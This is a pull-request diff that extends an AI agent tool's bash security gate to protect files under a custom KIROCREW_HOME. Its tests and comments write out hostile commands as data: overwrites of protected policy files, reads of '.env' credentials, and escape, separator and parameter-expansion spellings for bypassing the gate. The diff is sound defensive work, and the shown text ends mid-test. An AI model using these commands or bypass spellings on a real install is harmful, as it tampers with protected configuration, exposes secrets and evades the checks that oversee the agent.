### PR TITLE
fix(security): follow a custom KIROCREW_HOME on the bash gate too

### DIFF
--- a/docs/architecture/security-deep-dive.md
+++ b/docs/architecture/security-deep-dive.md
@@ -228,7 +228,11 @@ model's title **and** the raw command:
   that read credential paths, reach the cloud metadata endpoint under any IP
   encoding, or dump credential environment variables. Regex fast-path first, then
   a tokenizing pass that resolves quoting, empty-string concatenation, `$HOME`
-  and tilde before routing path-like tokens through `is_sensitive_path()`.
+  and tilde before routing path-like tokens through `is_sensitive_path()`. The
+  home-anchored patterns also carry the RESOLVED data home, so an install with a
+  non-default `KIROCREW_HOME` is fenced on the shell path against the same files
+  the Layer 1 tool gate fences — that gate resolves through the override, and a
+  file protected on only one of the two paths is not protected.
 - **Exfiltration shapes** (`audit_bash_exfiltration`): data-egress and
   reverse-shell forms, narrowly scoped so it can be a hard deny at the gate
   without blocking benign local commands.

--- a/src/kiro_crew/apps/builtins/ops_mission_control/tests/test_security.py
+++ b/src/kiro_crew/apps/builtins/ops_mission_control/tests/test_security.py
@@ -787,26 +787,31 @@ class TestTheScheduleIsWriteProtectedButReadable(unittest.TestCase):
         verb-independent, because a narrow allowlist is bypassable by a quoted redirect, `cp`,
         or any novel write verb.
 
-        Spelled with POSIX separators, which is what the gate matches and what a bash command
-        carries. A native `WindowsPath` renders all-backslash and matches nothing — a
-        whole-gate limitation on `security`'s home-anchored patterns, not specific to this
-        leaf, so pinning it here would assert a fix this file does not own.
+        Both spellings are asserted, because the gate now recognises both. The HOME FORMS
+        (`~`, `$HOME`, `/home/<user>`, `/Users/<user>`) are what the string matcher has always
+        anchored on. `self._path()` is the RESOLVED path — under test isolation, and on any
+        install with a custom `KIROCREW_HOME` (a pod, `dev-backend.sh`), it carries neither a
+        home spelling nor a crew prefix, so it used to reach the gate as an ordinary path.
 
-        Iterates the HOME FORMS rather than `self._path()`, the same way the incidents-index
-        equivalent below does, and the difference is load-bearing rather than stylistic. The
-        bash gate is a STRING matcher over `_CREW_HOME_PREFIXES` (`.kiro/crew`, `.kirocrew`),
-        so it recognises a command only by the home spelling the command carries. The tool
-        gate on the two tests above is not: `is_sensitive_write_path` resolves through
-        `config_dir()`, so it DOES follow a non-default `KIROCREW_HOME`.
-
-        That asymmetry means a custom-`KIROCREW_HOME` install (a pod, `dev-backend.sh`) has
-        this file protected against the agent's file tools but not against a bash redirect
-        naming the resolved path. It is a `security` gate limitation, not this app's, so it is
-        recorded here rather than half-fixed at this leaf. Handing `self._path()` to the bash
-        gate does not test it either way: under test isolation that path is a tmp dir, so the
-        assertion passed only while the suite was reading the operator's REAL home, and it
-        reported a guarantee it had not checked.
+        That gap was the asymmetry this test previously recorded rather than pinned: the tool
+        gate on the two tests above resolves through `config_dir()` and followed the override,
+        while the shell gate did not, leaving this file protected against the agent's file
+        tools and reachable by a bash redirect naming its real path. `security` now anchors
+        the resolved data home as well, so the resolved form belongs in the assertion — and
+        keeping it here is what stops the two gates drifting apart again at this leaf.
         """
+        for path in (self._path(),):
+            for cmd in (
+                f"echo 'who: attacker' > {path}",
+                f"cp /tmp/evil.yaml {path}",
+                f"tee {path}",
+                f"""python -c "open('{path}','w').write('x')" """,
+            ):
+                with self.subTest(resolved=cmd[:40]):
+                    self.assertTrue(
+                        security.is_sensitive_bash_command(cmd),
+                        f"shell write to the RESOLVED path not blocked: {cmd!r}",
+                    )
         for home in ("~", "$HOME", "/home/alice", "/Users/alice"):
             path = f"{home}/.kiro/crew/apps/ops-mission-control/data/rotation.yaml"
             for cmd in (

--- a/src/kiro_crew/security.py
+++ b/src/kiro_crew/security.py
@@ -9164,6 +9164,43 @@ def _sensitive_path_pattern() -> str:
     return rf"{home_alts}/(?:{dirs_pattern}){path_end}"
 
 
+def _shell_escape_tolerant(text: str) -> str:
+    """``re.escape`` *text*, but let an unquoted shell backslash still match.
+
+    An UNQUOTED backslash escapes the next character and is removed by the
+    shell, whatever that character is. Measured, not assumed::
+
+        cr\\ewhome   -> crewhome      (unquoted: the escape collapses)
+        "cr\\ewhome" -> cr\\ewhome    (double-quoted: backslash survives)
+        'cr\\ewhome' -> cr\\ewhome    (single-quoted: backslash survives)
+
+    So a command may spell a protected path with a backslash before ANY
+    character and still reach that exact file. Tolerating it only before
+    whitespace left every other position open: ``.../cr\\ewhome/...`` resolves to
+    ``.../crewhome/...`` on disk while a whitespace-only tolerance never matched
+    it. Accept an optional backslash before every character instead.
+
+    Whitespace additionally folds space and tab into one class. A path with a
+    space cannot appear bare in a command at all -- the shell requires it quoted
+    or escaped -- and a Windows profile directory routinely contains one
+    (``C:\\Users\\First Last``), so that spelling is ordinary rather than exotic.
+
+    OVER-matching by construction, in the fail-safe direction. The quoted
+    spellings above keep the backslash and therefore name a DIFFERENT path, but
+    this gate matches raw command text and cannot see quoting, so it fences them
+    too. Refusing a path that would not have resolved here is safe; missing one
+    that would is the bug being fixed. Segments never contain a separator (the
+    caller splits on ``[\\/]`` first), so this adds no separator ambiguity.
+    """
+    out = []
+    for ch in text:
+        # ``\\?`` -- one optional literal backslash. Written this way rather than
+        # ``(?:\\)?`` to keep the compiled pattern small: this runs once per
+        # character of every anchored root and remainder.
+        out.append(r"\\?" + (r"[ \t]" if ch in " \t" else re.escape(ch)))
+    return "".join(out)
+
+
 def _build_sensitive_regex() -> re.Pattern[str]:
     """Build a compiled regex matching bash reads OR writes of sensitive paths.
 
@@ -9553,6 +9590,218 @@ def _build_sensitive_regex() -> re.Pattern[str]:
         rf"(?:{win_anchor}(?:{win_agents_dir_alt})"
         rf"|{win_kiro_home_var}{win_gsep}(?:{agents_leaf_alt})){win_path_end}"
     )
+    # ── Resolved crew-home anchor (a non-default ``KIROCREW_HOME``) ──
+    # Every branch above anchors on a home SPELLING (``~`` / ``$HOME`` / a
+    # literal ``/home/<user>`` / ``%USERPROFILE%``) FOLLOWED BY a crew prefix
+    # (``.kiro/crew``, ``.kirocrew``). A custom ``KIROCREW_HOME`` install carries
+    # NEITHER: the file's real path is
+    # ``$KIROCREW_HOME/apps/ops-mission-control/data/rotation.yaml``, with no
+    # tilde and no crew prefix anywhere in it.
+    #
+    # The TOOL gate already follows the override —
+    # ``_home_dir_targets_uncached`` re-anchors every crew-prefixed entry under
+    # the resolved home for exactly this reason — so without this branch a
+    # write-protected file is fenced against the agent's file tools and reachable
+    # by a bash redirect naming the resolved path. That asymmetry is the bug:
+    # protected on one path only is not protected.
+    #
+    # ``_resolved_root_key`` is the SAME resolver the tool gate keys its target
+    # set on, so the two gates cannot drift apart, and it only reads and resolves
+    # the env var: none of ``config_dir()``'s start-of-process maintenance (mkdir,
+    # legacy migration, breadcrumb refresh, archive sweep) runs on this gate path.
+    # It returns ``None`` for a default home, which the branches above cover.
+    crew_home = _resolved_root_key().crew_home
+    resolved_crew_branch = ""
+    if crew_home:
+        # Anchor spelled with the generalized separator rather than
+        # ``re.escape``d verbatim: the resolved literal is all-backslash on
+        # Windows, while a command can carry either separator (git-bash and
+        # msys tooling routinely render the same root with ``/``). Segments go
+        # through ``_shell_escape_tolerant`` for the same class of reason -- an
+        # unquoted backslash escapes the NEXT character and is removed by the
+        # shell, so ``.../cr\\ewhome/...`` and ``.../First\\ Last/...`` both reach
+        # the very file this branch fences while a plain literal matches
+        # neither.
+        #
+        # The join is ``win_gsep`` (the canonical-no-op chain the fenced-dir
+        # branches above already use) plus a repeated-separator tolerance, NOT a
+        # bare separator. The ROOT is as spellable as the remainder:
+        # ``/tmp/./custom-home``, ``/tmp//custom-home`` and
+        # ``/tmp/x/../custom-home`` all name the same directory, the tool gate
+        # fences all of them because it RESOLVES, and an exact-literal root would
+        # fence none. Over-matching a path that ends elsewhere is the safe
+        # direction here -- the same trade ``win_gsep`` already documents.
+        #
+        # BOTH spellings of the override are anchored, not just the resolved
+        # one. A symlinked (or junctioned) ``KIROCREW_HOME`` names one directory
+        # under two paths: the LEXICAL one the operator configured -- which is
+        # what a command actually carries, because it is the one the operator
+        # knows -- and the RESOLVED real path ``_resolved_root_key`` returns.
+        # The tool gate follows both, because ``_candidate_forms`` expands a
+        # target into its resolved AND its lexical forms; a pattern anchored on
+        # the resolved path alone left the lexical spelling open, so an embedded
+        # ``python -c "open('<lexical>','w')"`` reached a write-protected leaf
+        # that the file tools refuse. The lexical form is normalized with the
+        # same ``abspath(expanduser(...))`` pair ``_resolved_root_key`` itself
+        # falls back to, so one set of rules spells both roots; when resolution
+        # is a no-op (no link anywhere in the path) the two collapse to a single
+        # alternative and the pattern is exactly what it was before.
+        crew_gsep = rf"{win_gsep}{win_sep}*"
+        crew_roots = [crew_home]
+        crew_override = os.environ.get("KIROCREW_HOME")
+        if crew_override:
+            crew_lexical = os.path.abspath(os.path.expanduser(crew_override))
+            if crew_lexical and crew_lexical not in crew_roots:
+                crew_roots.append(crew_lexical)
+        crew_anchor = "|".join(
+            crew_gsep.join(
+                _shell_escape_tolerant(part) for part in re.split(r"[\\/]", root)
+            )
+            for root in crew_roots
+        )
+        # The RESOLVED/LEXICAL literal roots above are what a command carries
+        # when the operator typed a path. But a command can also name the same
+        # directory through the ``KIROCREW_HOME`` environment variable itself,
+        # which every spawned shell inherits and expands to the protected tree.
+        # A literal-only anchor left ``> "$KIROCREW_HOME/security_policy.json"``,
+        # ``%KIROCREW_HOME%\...`` and ``$env:KIROCREW_HOME/...`` open, while the
+        # tool gate (which resolves ``$KIROCREW_HOME`` before applying the write
+        # fence) refuses the same file (found in review). This mirrors branch (8),
+        # which anchors the agents dir on the literal ``$KIRO_HOME`` spellings for
+        # the same reason ``KIRO_HOME`` relocates it.
+        #
+        # Every spelling is a WHOLE reference terminated by its own closer, so
+        # ``$KIROCREW_HOME_BACKUP`` (a different variable) cannot match: the bare
+        # ``$NAME`` form is followed by a separator, and the delimited forms
+        # (``${...}``, ``%...%``, ``!...!``, ``${env:...}``) consume their closer.
+        # This anchor carries NO ``crew_gsep`` of its own -- the anchor->remainder
+        # join below supplies the separator.
+        crew_var = "KIROCREW_HOME"
+        crew_var_anchor = "|".join(
+            [
+                # POSIX ``$KIROCREW_HOME`` (bare) -- boundary is the following
+                # separator, enforced by the anchor->remainder ``crew_gsep`` join.
+                rf"{re.escape('$')}{crew_var}(?=[\\/])",
+                # POSIX ``${KIROCREW_HOME}`` and modifier forms ``${KIROCREW_HOME%/}``.
+                # The character right after the name must be the closing ``}`` or
+                # a parameter-expansion operator (``:-#%/^,@*`` etc.), never a
+                # name continuation -- otherwise ``${KIROCREW_HOME_BACKUP}`` (a
+                # different variable) would match.
+                rf"{re.escape('$')}\{{{crew_var}(?![A-Za-z0-9_])[^}}]*\}}",
+                # The reference nested INSIDE a parameter expansion of the
+                # variable itself: ``${KIROCREW_HOME:+$KIROCREW_HOME/<leaf>}``
+                # (either inner spelling) expands to the fenced path whenever
+                # the override is set. The full-expansion alternative above
+                # cannot see it -- its ``[^}]*`` must reach the closing brace
+                # before any remainder is read -- so this one anchors on the
+                # OUTER braced name and skips lazily to the first separator,
+                # where the ordinary gsep->remainder->closer chain takes over
+                # (the branch closer's ``}`` then ends the path at the
+                # expansion's own brace). The name-boundary guard keeps
+                # ``${KIROCREW_HOME_BACKUP}`` (a different variable) out, the
+                # same way it does for the alternative above; skipping stops at
+                # whitespace, quotes and separators, so the anchor can never
+                # wander into a neighbouring token.
+                rf"{re.escape('$')}\{{{crew_var}(?![A-Za-z0-9_])[^\\/\s'\"]*?(?=[\\/])",
+                # cmd.exe ``%KIROCREW_HOME%`` with optional expansion modifiers.
+                rf"%{crew_var}(?::[^%\s]*)?%",
+                # cmd.exe delayed expansion ``!KIROCREW_HOME!``.
+                rf"!{crew_var}(?::[^!\s]*)?!",
+                # PowerShell ``$env:KIROCREW_HOME`` and ``${env:KIROCREW_HOME}``.
+                rf"{re.escape('$env:')}{crew_var}(?=[\\/])",
+                rf"{re.escape('${env:')}{crew_var}\}}",
+            ]
+        )
+        crew_anchor = f"{crew_anchor}|{crew_var_anchor}"
+        # Remainders are the crew-prefix-RELATIVE tails of both lists. Derived by
+        # stripping whichever prefix an entry carries, the same way
+        # ``_home_dir_targets_uncached`` derives its re-anchored targets, so a
+        # leaf added to either list is covered here without a second edit.
+        crew_remainders = sorted(
+            {
+                d[len(prefix) :].lstrip("/")
+                for d in _SENSITIVE_HOME_DIRS
+                for prefix in _CREW_HOME_PREFIXES
+                if d.startswith(prefix + "/")
+            }
+            | set(_WRITE_PROTECTED_BASH_LEAVES)
+        )
+        # The intra-remainder join is ``crew_gsep`` for the same reason the
+        # anchor and the anchor->remainder join are: ``apps//ops-mission-control``
+        # names the same directory as ``apps/ops-mission-control``, the tool
+        # gate fences both because it resolves, and a plain ``win_gsep`` join
+        # (no repeated-separator tolerance) left the doubled-separator spelling
+        # open between remainder segments only.
+        crew_remainder_pattern = "|".join(
+            crew_gsep.join(
+                _shell_escape_tolerant(part) for part in remainder.split("/")
+            )
+            for remainder in crew_remainders
+        )
+        # (F2, review) Keystone publish artifacts under the CUSTOM home. The
+        # default home gets these from branch (3b); this mirrors it with the
+        # crew-prefix-RELATIVE parents so the atomic-write temp and lock
+        # sibling of a keystone leaf are fenced under an override too. Same
+        # closing shape as (3b): the suffix lookahead ends the match, not a
+        # terminator class -- see the comment above ``artifact_parents_pattern``
+        # for why the lookahead is the boundary. A parent equal to the crew
+        # prefix itself strips to the empty string: the artifact then sits
+        # directly under the crew home root and the anchor->gsep join alone
+        # positions it.
+        crew_artifact_parents = sorted(
+            {
+                d[len(prefix) :].lstrip("/")
+                for d in _KEYSTONE_ARTIFACT_PARENTS
+                for prefix in _CREW_HOME_PREFIXES
+                if d == prefix or d.startswith(prefix + "/")
+            }
+        )
+        crew_artifact_remainder = "|".join(
+            (
+                crew_gsep.join(
+                    _shell_escape_tolerant(part) for part in parent.split("/")
+                )
+                + crew_gsep
+                if parent
+                else ""
+            )
+            + rf"[^/\\\s'\"]*\.(?:{artifact_suffix_alt})(?![\w-])"
+            for parent in crew_artifact_parents
+        )
+        # The right boundary is the SHARED ``win_path_end`` class plus the
+        # POSIX ``/`` continuation and the closing ``}`` of a brace expansion,
+        # not a bespoke terminator. Three review rounds each caught one
+        # spelling a narrower closer let through: an operator glued straight
+        # onto the path (``.../rotation.yaml;id``), then a ``$``-expansion
+        # tail (``.../security_policy.json$null``) -- this branch matches
+        # PowerShell/cmd variable anchors, so like every other Windows-capable
+        # branch its closer must treat a literal ``$`` as path-ending, which
+        # ``win_path_end`` does and POSIX ``path_end`` does not -- and then a
+        # payload nested in a parameter expansion
+        # (``${KIROCREW_HOME:+$KIROCREW_HOME/...}``), whose path ends at the
+        # ``}`` neither shared class contains. Sharing ``win_path_end`` means
+        # an operator added there covers this branch without a second edit;
+        # ``/`` and ``}`` are the two closers it cannot absorb (``/`` is a
+        # separator inside Windows alternations, and ``}`` closes
+        # ``${env:...}`` anchors mid-pattern).
+        crew_tail = (
+            rf"(?:{crew_remainder_pattern})(?:/|\}}|{win_path_end})"
+            rf"|(?:{crew_artifact_remainder})"
+        )
+        resolved_crew_path = rf"(?:{crew_anchor}){crew_gsep}(?:{crew_tail})"
+        # The left boundary admits an ATTACHED short-option cluster between the
+        # token delimiter and the path. ``curl -o/custom/root/...`` glues the
+        # output path directly onto ``-o`` with no whitespace, quote, or ``=``
+        # in between, so a boundary of delimiter-then-path alone never saw it
+        # while the tool gate (which resolves the argument) refuses the same
+        # file. The option token must follow a real delimiter and start with
+        # ``-``, so a path that merely CONTAINS the root as a suffix
+        # (``/x/<root>/...``) still cannot match mid-path -- the negative
+        # controls in the parity tests pin both directions.
+        resolved_crew_branch = (
+            rf"|(?:^|[\s'\"=:,;])(?:--?[A-Za-z][\w-]*)?{resolved_crew_path}"
+        )
+
     # Bare path-SEGMENT match for the globally distinctive leaves. Both branches
     # above require a home anchor and a crew prefix, so both are defeated by a
     # single ``cd``; this one requires neither, which is the whole point — the
@@ -9644,6 +9893,12 @@ def _build_sensitive_regex() -> re.Pattern[str]:
         # only); tool-path reads stay allowed.
         rf"|(?:^|[\s'\"=:,;]){agents_write_path}"
         rf"|(?:^|[\s'\"=:,;]){win_agents_write_path}"
+        # (9) the SAME fenced dirs and write-protected leaves under a resolved
+        # non-default ``KIROCREW_HOME``, which carries neither a home spelling
+        # nor a crew prefix. Empty string when the home is the default one.
+        # Disjoint from (8): that branch fences ``~/.kiro/agents``, which
+        # ``KIRO_HOME`` relocates and ``KIROCREW_HOME`` does not.
+        f"{resolved_crew_branch}"
         # (10) whisper weight FILENAMES, also with no anchor, because the digest the
         # model store checks only binds the bytes if the name it then loads cannot be
         # rewritten by a ``cd``-relative command.
@@ -9653,14 +9908,38 @@ def _build_sensitive_regex() -> re.Pattern[str]:
     )
 
 
-_SENSITIVE_RE: re.Pattern[str] | None = None
+# Compiled patterns per ``KIROCREW_HOME`` value. The pattern embeds the
+# RESOLVED crew home, so a process that changes ``KIROCREW_HOME`` (a test, an
+# embedder) must not keep matching against the previous one.
+#
+# Keyed on the RAW env var rather than on the resolved root: this is read on
+# every bash-gate call and resolving would put a ``Path.resolve()`` on that hot
+# path, whereas the raw value changes exactly when an override is selected or
+# dropped. The residual — a symlink UNDER the override repointed mid-process —
+# can only leave the resolved-literal branch naming the old location; it removes
+# no existing branch, so the home-spelling and bare-leaf strategies are
+# unaffected and the gate cannot fall below what it matched before.
+#
+# PER-KEY, not single-slot: a test suite (or embedder) flips the override and
+# restores it constantly, and a single-slot cache re-ran the ~30-70ms pattern
+# build on every flip — landing that cost inside whatever the NEXT caller
+# happened to be timing (the traversal perf budget, on CI). Distinct values a
+# real process sees number a handful, so a small bounded dict holds them all;
+# the bound only guards a pathological embedder that generates unbounded
+# distinct overrides, evicting oldest-inserted first.
+_SENSITIVE_RE_BY_HOME: dict[str | None, re.Pattern[str]] = {}
+_SENSITIVE_RE_MAX_KEYS = 8
 
 
 def _get_sensitive_re() -> re.Pattern[str]:
-    global _SENSITIVE_RE
-    if _SENSITIVE_RE is None:
-        _SENSITIVE_RE = _build_sensitive_regex()
-    return _SENSITIVE_RE
+    home_key = os.environ.get("KIROCREW_HOME")
+    pattern = _SENSITIVE_RE_BY_HOME.get(home_key)
+    if pattern is None:
+        pattern = _build_sensitive_regex()
+        if len(_SENSITIVE_RE_BY_HOME) >= _SENSITIVE_RE_MAX_KEYS:
+            _SENSITIVE_RE_BY_HOME.pop(next(iter(_SENSITIVE_RE_BY_HOME)))
+        _SENSITIVE_RE_BY_HOME[home_key] = pattern
+    return pattern
 
 
 # ── The verb-anchored form of the sensitive-path match, walked linearly ──

--- a/test/test_security.py
+++ b/test/test_security.py
@@ -8070,6 +8070,579 @@ class TestDeniedCommandsKeystone:
             assert is_sensitive_bash_command(cmd) is not None, cmd
 
 
+class TestBashGateFollowsACustomKirocrewHome:
+    """The bash gate must fence the SAME files the tool gate does (#4082).
+
+    ``is_sensitive_write_path`` resolves through the data home, so it follows a
+    non-default ``KIROCREW_HOME``. ``is_sensitive_bash_command`` was a string
+    matcher over the home SPELLINGS a command can carry (``~``, ``$HOME``,
+    ``/home/<user>``) plus the crew prefixes (``.kiro/crew``, ``.kirocrew``), and
+    a resolved override path carries neither -- so on such an install a
+    write-protected file was fenced against the agent's file tools and reachable
+    by a bash redirect naming its real path.
+
+    The invariant these tests pin is PARITY, not the branch: every assertion
+    below states what the tool gate already answers and requires the shell gate
+    to answer the same. A custom home is a normal single-instance install --
+    ``kirocrew pod`` and ``dev-backend.sh`` both use one.
+    """
+
+    LEAF = "apps/ops-mission-control/data/rotation.yaml"
+
+    def _resolved(self, home: Path, leaf: str) -> str:
+        return str(home.joinpath(*leaf.split("/")))
+
+    def test_an_expansion_tail_does_not_end_the_path_early(self, tmp_path, monkeypatch):
+        """A ``$``-expansion glued onto the leaf is still the same file (review).
+
+        The branch matches PowerShell/cmd variable anchors, so its closer must
+        treat a literal ``$`` as path-ending the way ``win_path_end`` does for
+        every other Windows-capable branch: the shell expands ``$null`` (or an
+        unset ``$x``) away and the write lands on the fenced leaf itself.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        for cmd in (
+            "Set-Content $env:KIROCREW_HOME/security_policy.json$null x",
+            "cat $KIROCREW_HOME/.env$x",
+            f"cat {self._resolved(tmp_path, '.env')}$x",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_a_payload_nested_in_a_parameter_expansion_is_fenced(self, tmp_path, monkeypatch):
+        """``${KIROCREW_HOME:+$KIROCREW_HOME/<leaf>}`` expands to the fenced path.
+
+        Whenever the override is set -- the only case this class is about --
+        the ``:+`` form substitutes its payload, so the command writes the
+        fenced leaf while spelling it entirely inside one brace expansion. The
+        full-expansion anchor cannot see it (its ``[^}]*`` must reach the
+        closing brace before any remainder is read), so the nested-payload
+        anchor and the branch closer's ``}`` are what these assert (review).
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        for cmd in (
+            "cat ${KIROCREW_HOME:+$KIROCREW_HOME/.env}",
+            "cat ${KIROCREW_HOME:+${KIROCREW_HOME}/.env}",
+            "echo x > ${KIROCREW_HOME:+$KIROCREW_HOME/" + self.LEAF + "}",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+        # Name-boundary control: a DIFFERENT variable that merely starts with
+        # the name stays out, exactly like the full-expansion anchor's guard.
+        assert is_sensitive_bash_command("cat ${KIROCREW_HOME_BACKUP:+x/.env}") is None
+
+    def test_keystone_publish_artifacts_are_fenced_under_the_override(self, tmp_path, monkeypatch):
+        """The atomic-write temp and lock sibling follow the override (review).
+
+        Branch (3b) fences them under the default home; parity requires the
+        crew branch to fence the same shapes under a custom home, including
+        the embedded-script spelling only the regex pass can see.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        for leaf in ("security_policy.json.tmp", "security_policy.json.lock"):
+            for cmd in (
+                f"cat $KIROCREW_HOME/{leaf}",
+                f"cat {self._resolved(tmp_path, leaf)}",
+                f"python -c \"open('$KIROCREW_HOME/{leaf}','w').write('x')\"",
+            ):
+                assert is_sensitive_bash_command(cmd) is not None, cmd
+        # Shape control, mirroring (3b): a name that merely CONTINUES past the
+        # suffix is a different file and stays allowed.
+        assert is_sensitive_bash_command("cat $KIROCREW_HOME/security_policy.json.tmpx") is None
+
+    def test_the_two_gates_agree_on_a_write_protected_leaf(self, tmp_path, monkeypatch):
+        """The parity statement itself: same file, same answer, both gates."""
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        path = self._resolved(tmp_path, self.LEAF)
+
+        assert security.is_sensitive_write_path(path), (
+            "precondition: the tool gate follows the override -- if this ever "
+            "goes False the asymmetry is gone for a different reason and this "
+            "whole class is asserting nothing"
+        )
+        assert is_sensitive_bash_command(f"echo 'who: attacker' > {path}") is not None
+
+    def test_every_write_form_is_refused_not_just_a_redirect(self, tmp_path, monkeypatch):
+        """Verb-independent, like every other branch of this gate.
+
+        A narrow verb allowlist is bypassed by a quoted redirect, ``cp``, or any
+        novel write verb, so the resolved-home branch is asserted across forms
+        rather than at one of them.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        path = self._resolved(tmp_path, self.LEAF)
+
+        for cmd in (
+            f"echo 'who: attacker' > {path}",
+            f"cp /tmp/evil.yaml {path}",
+            f"tee {path}",
+            f"""python -c "open('{path}','w').write('x')" """,
+            f"sed -i s/alice/attacker/ {path}",
+            f"mv /tmp/evil.yaml {path}",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, f"not blocked: {cmd!r}"
+
+    def test_a_crew_secret_leaf_under_the_override_is_blocked_too(self, tmp_path, monkeypatch):
+        """Not only the write-protected leaves: the credential floor moves as well.
+
+        ``_SENSITIVE_HOME_DIRS``' crew-prefixed entries are re-anchored under the
+        override by the tool gate, so the shell gate owes them the same coverage.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        path = str(tmp_path / ".env")
+
+        assert security.is_sensitive_path(path), "precondition: the tool gate blocks it"
+        assert is_sensitive_bash_command(f"cat {path}") is not None
+
+    def test_either_separator_spells_the_same_root(self, tmp_path, monkeypatch):
+        """The resolved literal is all-backslash on Windows; commands are not.
+
+        git-bash and msys tooling render the same root with ``/``, and a gate
+        that matched only the native rendering would be bypassed by the spelling
+        the shell actually carries.
+        """
+        monkeypatch.setenv("KIROCREW_HOME", str(tmp_path))
+        path = self._resolved(tmp_path, self.LEAF)
+
+        assert is_sensitive_bash_command(f"echo x > {path}") is not None
+        assert is_sensitive_bash_command("echo x > " + path.replace("\\", "/")) is not None
+
+    def test_an_escaped_ordinary_character_does_not_bypass_the_fence(self, tmp_path, monkeypatch):
+        """A shell backslash before ANY character, not just whitespace.
+
+        An UNQUOTED backslash escapes the next character and is removed by the
+        shell whatever that character is, so ``.../cr\\ewhome/...`` reaches the
+        very file ``.../crewhome/...`` names. Measured, not assumed::
+
+            cr\\ewhome   -> crewhome      (unquoted: the escape collapses)
+            "cr\\ewhome" -> cr\\ewhome    (quoted: the backslash survives)
+
+        Tolerating the backslash only before whitespace left every other
+        position open, which is a bypass of the fence rather than a cosmetic
+        gap: the tool gate resolves the path and refuses it, so the shell gate
+        answering differently is exactly the asymmetry this class exists to
+        forbid.
+        """
+        home = tmp_path / "crewhome"
+        home.mkdir()
+        monkeypatch.setenv("KIROCREW_HOME", str(home))
+        resolved = self._resolved(home, self.LEAF).replace("\\", "/")
+
+        def escaped_at(text: str, needle: str, offset: int) -> str:
+            cut = text.index(needle) + offset
+            return text[:cut] + "\\" + text[cut:]
+
+        # The tool gate is the reference answer for every spelling below.
+        assert security.is_sensitive_write_path(self._resolved(home, self.LEAF))
+
+        for label, spelling in (
+            ("mid-segment in the root", escaped_at(resolved, "crewhome", 2)),
+            ("first character of a root segment", escaped_at(resolved, "crewhome", 0)),
+            ("mid-segment in the remainder", escaped_at(resolved, "rotation", 3)),
+            ("mid-segment in an intermediate dir", escaped_at(resolved, "apps", 2)),
+        ):
+            assert (
+                security.is_sensitive_bash_command("echo 'who: attacker' > " + spelling) is not None
+            ), "escaped spelling bypasses the fence ({}): {!r}".format(label, spelling)
+            # An embedded interpreter carries the same text past the tokenizer.
+            assert (
+                security.is_sensitive_bash_command(
+                    """python -c "open('{}','w').write('x')" """.format(spelling)
+                )
+                is not None
+            ), "escaped spelling bypasses the fence via a script ({})".format(label)
+
+        # Controls -- tolerating a backslash must not fence MORE than the root.
+        assert (
+            security.is_sensitive_bash_command(
+                "echo hi > " + escaped_at(resolved, "crewhome", 2).replace(self.LEAF, "notes.txt")
+            )
+            is None
+        ), "an ordinary file under the override must stay writable"
+        sibling = self._resolved(tmp_path / "crewhome-two", self.LEAF).replace("\\", "/")
+        assert (
+            security.is_sensitive_bash_command("echo x > " + escaped_at(sibling, "crewhome", 2))
+            is None
+        ), "a sibling root that merely shares a prefix is not the data home"
+
+    def test_a_home_with_a_space_is_fenced_in_every_shell_spelling(self, tmp_path, monkeypatch):
+        """A space in the home is the ordinary case on Windows, not a corner.
+
+        ``C:\\Users\\First Last`` is a perfectly normal profile directory, so a
+        ``KIROCREW_HOME`` under one is normal too. A path with a space cannot
+        appear bare in a command: the shell requires it quoted or
+        backslash-escaped. The quoted forms keep the raw space and match a plain
+        literal, but ``.../my\\ home/...`` carries a backslash the literal does
+        not have -- so a literal anchor would fence three spellings out of four
+        and leave the fourth open, which is not a fence.
+        """
+        home = tmp_path / "my home"
+        home.mkdir()
+        monkeypatch.setenv("KIROCREW_HOME", str(home))
+        path = self._resolved(home, self.LEAF).replace("\\", "/")
+
+        assert security.is_sensitive_write_path(path), "precondition: tool gate blocks it"
+        for spelling in (
+            path,  # bare (only legal inside quotes anyway)
+            f'"{path}"',  # double-quoted
+            f"'{path}'",  # single-quoted
+            path.replace(" ", "\\ "),  # backslash-escaped
+        ):
+            assert (
+                is_sensitive_bash_command(f"echo x > {spelling}") is not None
+            ), f"shell write not blocked for spelling: {spelling!r}"
+
+    def test_a_canonical_no_op_spelling_of_the_root_still_anchors(self, tmp_path, monkeypatch):
+        """The ROOT is as spellable as the remainder, so it needs the same tolerance.
+
+        ``/x/./home``, ``/x//home`` and ``/x/zz/../home`` all name the same
+        directory. The tool gate fences every one of them because it RESOLVES
+        the path; a root anchored as an exact literal fences none, which is a
+        one-character bypass of the whole branch.
+
+        The negative controls below are what keep the tolerance honest: a
+        sibling root that merely shares a prefix must NOT be fenced.
+        """
+        home = tmp_path / "crew home"
+        home.mkdir()
+        monkeypatch.setenv("KIROCREW_HOME", str(home))
+        parent = str(tmp_path).replace("\\", "/")
+        tail = "/" + self.LEAF
+
+        for spelling in (
+            f"{parent}/crew home{tail}",
+            f"{parent}/./crew home{tail}",
+            f"{parent}//crew home{tail}",
+            f"{parent}/zz/../crew home{tail}",
+            f"{parent}/./crew home{tail}".replace("/", "\\"),
+        ):
+            assert (
+                is_sensitive_bash_command(f"echo x > {spelling}") is not None
+            ), f"shell write not blocked for root spelling: {spelling!r}"
+
+        assert is_sensitive_bash_command(f"echo x > {parent}/other home{tail}") is None
+        assert is_sensitive_bash_command(f"echo hi > {parent}/crew home/notes.txt") is None
+
+    def test_a_canonical_no_op_spelling_inside_the_remainder_still_matches(
+        self, tmp_path, monkeypatch
+    ):
+        """The REMAINDER is as spellable as the root, so its joins need the
+        same tolerance.
+
+        ``apps//ops-mission-control/...`` and ``apps/./ops-mission-control/...``
+        name the same file as the plain spelling, and the tool gate fences all
+        of them because it resolves; a remainder joined without the
+        repeated-separator tolerance fenced the root's no-op spellings while a
+        single doubled separator BETWEEN remainder segments walked straight
+        past the branch.
+
+        The negative control keeps the tolerance honest: an ordinary file
+        under the override spelled with a doubled separator must stay writable.
+        """
+        home = tmp_path / "crewhome"
+        home.mkdir()
